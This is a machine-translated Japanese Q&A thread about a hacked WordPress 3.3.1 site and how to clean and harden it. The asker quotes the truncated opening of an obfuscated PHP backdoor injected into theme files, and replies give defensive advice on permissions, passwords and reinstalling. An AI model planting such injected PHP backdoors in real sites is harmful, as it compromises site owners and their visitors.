私は更新されたwordpressサイトでこのコードを手に入れました。WordpressのハッキングとPHPコードが追加されました
ワードプレス3.3.1、すべてのプラグインが最新です。
プラグインリスト:custom-contact-forms、google-maps-for-wordpress & seo-ultimate。
CHMOD 644の場合、影響を受けるテーマファイルがありますが、CHMOD 777を使用してこのファイルを起動するたびに、777ファイルのみに影響を与えますが、644ファイルにも影響します。
コードは以下の通りである:だから
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
、どのように私はこれを防ぐことができ、そしてコードが何をするのでしょうか?
Wordpressファイルは777になりません。最大アクセス権は755個のフォルダ、644個のファイルです。 Hardening WordPress « WordPress Codex.
あなたのホスティングアカウント(たぶん安価な共有ホスティング)はおそらくハックベクトルです。あなたのホストに教えてください。おそらくより安全なホストを見つけるでしょう。すべてのパスワードを変更します。自分のPCをスキャンします。
完全FAQ: My site was hacked « WordPress CodexとHow to completely clean your hacked wordpress installationとHow to find a backdoor in a hacked WordPress.
こんにちは、ありがとう、私はちょうどwordpressとすべてのプラグインを再インストールを完了します。今はすべて安全ですが、奇妙なことは、ハックはページの状態を200から500に変更するだけで、Googleで本当に傷つけることです。サイトはユーザーには大丈夫ですが、ヘッダーレスポンスを見れば500になります。 いずれにしても、すべて修正されました。 – user1068410
ありがとう!私はWordPressの強化版の記事に続き、Wordpressを確保するためのヒントを掲載したブログも見つけました。http://dmlogic.com/blog/alternative-thoughts-on-securing-wordpress/ – user799188
まあを参照してください、あなたのWPをクリーンインストールしてアカウントをホスティングするために、私は今、私はそれについてGoogleで検索を開始します推測、それはバックドアのようになっていることを知りませんでした。 - ありがとう これを防止する方法やコードが行うことを理解する助けがあります – user1068410
@Niklas Baumstark - あなたは "アプリ"と言うのはWordPressのファイルですか? – user1068410